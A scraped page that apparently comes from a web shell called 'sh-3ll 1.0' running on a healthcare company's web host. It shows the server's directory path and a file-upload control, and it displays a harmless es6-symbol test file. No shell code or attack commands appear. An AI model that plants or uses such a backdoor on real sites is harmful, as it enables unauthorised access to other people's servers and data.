HOME


sh-3ll 1.0
DIR:/home/medisavehealth/www/bright.medisavehealthcarebd.com/node_modules/es6-symbol/test/
Upload File :
Current File : /home/medisavehealth/www/bright.medisavehealthcarebd.com/node_modules/es6-symbol/test/index.js
"use strict";

var d              = require("d")
  , defineProperty = Object.defineProperty;

module.exports = function (t, a) {
	var symbol = t("test"), obj = {};
	defineProperty(obj, symbol, d("foo"));
	a(obj.test, undefined, "Name");
	a(obj[symbol], "foo", "Get");
};